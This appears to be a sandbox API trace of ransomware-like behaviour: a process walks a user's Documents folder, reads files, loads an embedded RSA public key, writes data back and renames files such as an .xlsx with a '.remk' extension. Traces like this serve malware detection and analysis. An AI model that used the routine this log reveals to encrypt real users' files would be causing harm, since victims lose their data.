[0236.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0236.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc660 | out: hHeap=0x630000) returned 1 [0236.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc648 | out: hHeap=0x630000) returned 1 [0236.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6a8 | out: hHeap=0x630000) returned 1 [0236.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0236.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.070] GetCurrentThreadId () returned 0x314 [0236.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c5400 [0236.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0236.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0236.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.070] GetCurrentThreadId () returned 0x314 [0236.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0236.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0236.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0236.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0236.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0236.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6a8 [0236.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0236.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0236.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0236.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0236.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0236.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc648 [0236.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0236.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0236.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0236.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0236.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc660 [0236.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0236.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0236.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc630 [0236.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0236.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6c0 [0236.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0236.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0236.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc690 [0236.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc678 [0236.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc6d8 [0236.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc678 | out: hHeap=0x630000) returned 1 [0236.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc678 [0236.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc690 | out: hHeap=0x630000) returned 1 [0236.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0236.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0236.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0236.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc648 | out: hHeap=0x630000) returned 1 [0236.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc648 [0236.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0236.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6a8 | out: hHeap=0x630000) returned 1 [0236.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0236.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6d8 | out: hHeap=0x630000) returned 1 [0236.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0db8 [0236.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0236.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0236.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0236.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0236.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc648 | out: hHeap=0x630000) returned 1 [0236.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37c0fd0 [0236.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0236.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0236.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0236.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0236.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0236.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0236.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0236.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0236.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fd0 | out: hHeap=0x630000) returned 1 [0236.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0236.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0236.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc678 | out: hHeap=0x630000) returned 1 [0236.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0236.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6c0 | out: hHeap=0x630000) returned 1 [0236.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc660 | out: hHeap=0x630000) returned 1 [0236.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc630 | out: hHeap=0x630000) returned 1 [0236.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0236.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0236.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc618 | out: hHeap=0x630000) returned 1 [0236.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dda8 | out: hHeap=0x630000) returned 1 [0236.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0236.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0236.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0236.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0236.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0236.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0236.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0236.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.075] WriteFile (in: hFile=0x640, lpBuffer=0x37c6278*, nNumberOfBytesToWrite=0x3065, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c6278*, lpNumberOfBytesWritten=0x3adfb14*=0x3065, lpOverlapped=0x0) returned 1 [0236.076] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c6278 | out: hHeap=0x630000) returned 1 [0236.076] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x306a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.076] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.076] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.076] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0236.076] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0236.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0236.076] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0236.076] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.076] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0236.076] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0236.076] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0236.076] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.076] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.077] CloseHandle (hObject=0x640) returned 1 [0236.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xf0) returned 0x65dd10 [0236.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8f0) returned 0x37bd408 [0236.078] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.078] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\aYykKL9sNmuS205lNQxb.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\t648 z2t0mst-97jbqs\\ayykkl9snmus205lnqxb.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\aYykKL9sNmuS205lNQxb.xlsx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\t648 z2t0mst-97jbqs\\ayykkl9snmus205lnqxb.xlsx.remk")) returned 1 [0236.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0236.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.080] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0236.081] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77ff2880, ftCreationTime.dwHighDateTime=0x1d5dbd7, ftLastAccessTime.dwLowDateTime=0xafa355e0, ftLastAccessTime.dwHighDateTime=0x1d5dfa6, ftLastWriteTime.dwLowDateTime=0xafa355e0, ftLastWriteTime.dwHighDateTime=0x1d5dfa6, nFileSizeHigh=0x0, nFileSizeLow=0x859c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GHrUuVSNZ.ods", cAlternateFileName="GHRUUV~1.ODS")) returned 1 [0236.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c78d8 [0236.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11e) returned 0x3192918 [0236.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c78d8 | out: hHeap=0x630000) returned 1 [0236.081] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\GHrUuVSNZ.ods") returned=".ods" [0236.081] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\GHrUuVSNZ.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\t648 z2t0mst-97jbqs\\ghruuvsnz.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.090] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=34204) returned 1 [0236.090] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.093] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x8576, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.093] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.095] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.095] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x859c, lpOverlapped=0x0) returned 1 [0236.096] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.097] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.097] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.097] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.098] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.098] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.098] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.098] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.098] GetLastError () returned 0x0 [0236.098] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.098] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.098] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.098] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.098] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x85a0) returned 0x37c6278 [0236.099] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0236.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0236.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37ce838 [0236.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc618 [0236.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37ce880 [0236.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc630 [0236.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc660 [0236.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6c0 [0236.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc678 [0236.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0236.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 